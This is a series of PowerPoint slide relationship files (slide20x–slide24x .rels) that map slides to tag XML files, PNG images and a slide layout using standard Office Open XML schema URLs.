<file path=ppt/slides/_rels/slide20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81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1080.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1079.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1078.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1077.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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0.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1087.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1086.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1085.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1084.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1083.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag108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17.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag91.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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1.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1093.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1092.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1091.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1090.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1089.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1088.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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2.png"/><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tags" Target="../tags/tag1097.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1096.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1095.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1094.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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105.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1104.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1103.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1102.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1101.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1100.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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4.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1111.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1110.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1109.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1108.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1107.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1106.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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5.png"/><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tags" Target="../tags/tag1115.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1114.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1113.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1112.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1123.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1122.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1121.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1120.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1119.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1118.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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7.png"/><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tags" Target="../tags/tag1126.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1125.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1124.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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33.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1132.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1131.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1130.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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38.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1137.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1136.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1135.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1134.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide219.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1147.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1146.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1145.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1144.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1143.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1142.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1141.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1140.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1139.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52.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1151.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1150.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1149.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1148.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1161.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1160.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1159.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1158.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tags" Target="../tags/tag1155.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1154.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1162.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1153.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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5.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1164.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1163.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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8.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1167.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1166.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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72.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1171.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1170.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1169.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide226.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1181.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1180.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1179.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1178.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1177.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1176.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1175.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1174.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1188.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1187.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1186.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1185.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1184.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1183.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1182.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1173.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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92.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1191.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1190.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1189.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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tags" Target="../tags/tag1195.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1194.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1193.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1204.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1203.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1202.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1201.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1200.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1199.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18.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag99.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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210.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1209.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1208.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1207.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1206.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1205.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1214.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1213.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1212.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1211.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide232.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1222.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1221.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1220.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1219.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1218.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1217.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1216.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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27.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1226.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1225.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1224.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1223.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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2.png"/><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tags" Target="../tags/tag1231.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1230.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1229.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1228.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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38.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1237.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1236.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1235.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1234.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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3.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1244.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1243.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1242.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1241.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1240.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1239.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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4.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1250.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1249.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1248.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1247.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1246.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1245.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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5.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1256.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1255.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1254.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1253.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1252.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1251.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide239.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image147.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1263.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1262.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1261.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1260.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1259.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1258.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1257.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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image" Target="../media/image21.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag107.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><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19.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag103.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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269.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1268.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1267.xml"/><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s>
</file>

<file path=ppt/slides/_rels/slide24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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1271.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1270.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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9.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1280.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1279.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1278.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1277.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1276.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1275.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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0.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1286.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1285.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1284.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1283.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1282.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1281.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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1.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1292.xml"/><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tags" Target="../tags/tag1289.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1288.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1287.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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298.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1297.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1296.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1295.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1294.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1293.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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03.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1302.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1301.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1300.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1299.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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3.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1309.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1308.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1307.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1306.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1305.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1304.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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4.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1315.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1314.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1313.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1312.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1311.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1310.xml"/></Relationships>
</file>

